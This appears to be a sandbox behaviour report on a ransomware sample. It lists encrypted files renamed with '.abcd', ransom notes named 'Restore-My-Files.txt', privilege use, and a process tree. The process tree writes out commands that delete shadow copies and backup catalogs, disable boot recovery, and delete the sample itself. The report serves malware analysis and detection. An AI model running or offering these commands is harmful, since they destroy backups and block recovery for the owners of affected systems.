| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\fonts\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-400_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_OEM_Perp-ul-phn.xrm-ms.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\lib\orb.idl | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_KMS_Client-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\MicrosoftAccount.scale-140.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-30_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-100.png.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Call_Ringing_Long.m4a | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-white_scale-100.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\ui-strings.js.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe
"C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 20
Network
Files
C:\Users\Admin\Desktop\resultlog7.reg
C:\Program Files\Common Files\DESIGNER\Restore-My-Files.txt
C:\Users\Admin\Desktop\resultlog7.reg
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemuiset.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm.abcd
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm.abcd
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.abcd
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.abcd
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.abcd
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.abcd
C:\ProgramData\Package Cache\{fb0500c1-f968-4621-a48b-985b52884c49}\state.rsm.abcd
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm.abcd
C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\state.rsm.abcd
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm.abcd
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\state.rsm.abcd
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm.abcd
C:\ProgramData\Package Cache\{17316079-d65a-4f25-a9f3-56c32781b15d}\state.rsm.abcd
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json.abcd
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol.abcd
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.abcd
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.abcd
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.abcd
C:\ProgramData\Microsoft\User Account Pictures\user.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\user.bmp.abcd
C:\ProgramData\Microsoft\User Account Pictures\user-48.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\user-40.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\user-32.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\user-192.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\guest.png.abcd
C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00002.log.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.abcd
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk.abcd
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm.abcd
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.abcd
C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.abcd
C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs.abcd
C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs.abcd
C:\ProgramData\Microsoft\Network\Downloader\edb.log.abcd
C:\ProgramData\Microsoft\Network\Downloader\edb.chk.abcd
C:\ProgramData\Microsoft\MF\Pending.GRL.abcd
C:\ProgramData\Microsoft\MF\Active.GRL.abcd
C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml.abcd
C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml.abcd
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log.abcd
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2023_12_15_12_54_43.etl.abcd
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2023_12_15_12_54_12.etl.abcd
C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.abcd
C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.abcd
C:\ProgramData\Microsoft\Diagnosis\EventStore.db.abcd
C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.bk.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-Eco3PTelDefault.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-d5a8f02229be41efb047bd8f883ba799-59258264-451c-4459-8c09-75d7d721219a-7112.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-af397ef28e484961ba48646a5d38cf54-77418283-d6f6-4a90-b0c8-37e0f5e7b087-7425.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-4bb4d6f7cafc4e9292f972dca2dcde42-bd019ee8-e59c-4b0f-a02c-84e72157a3ef-7485.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\TELEMETRY.ASM-WINDOWSSQ.json.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.bk.abcd
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32ww.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man.abcd
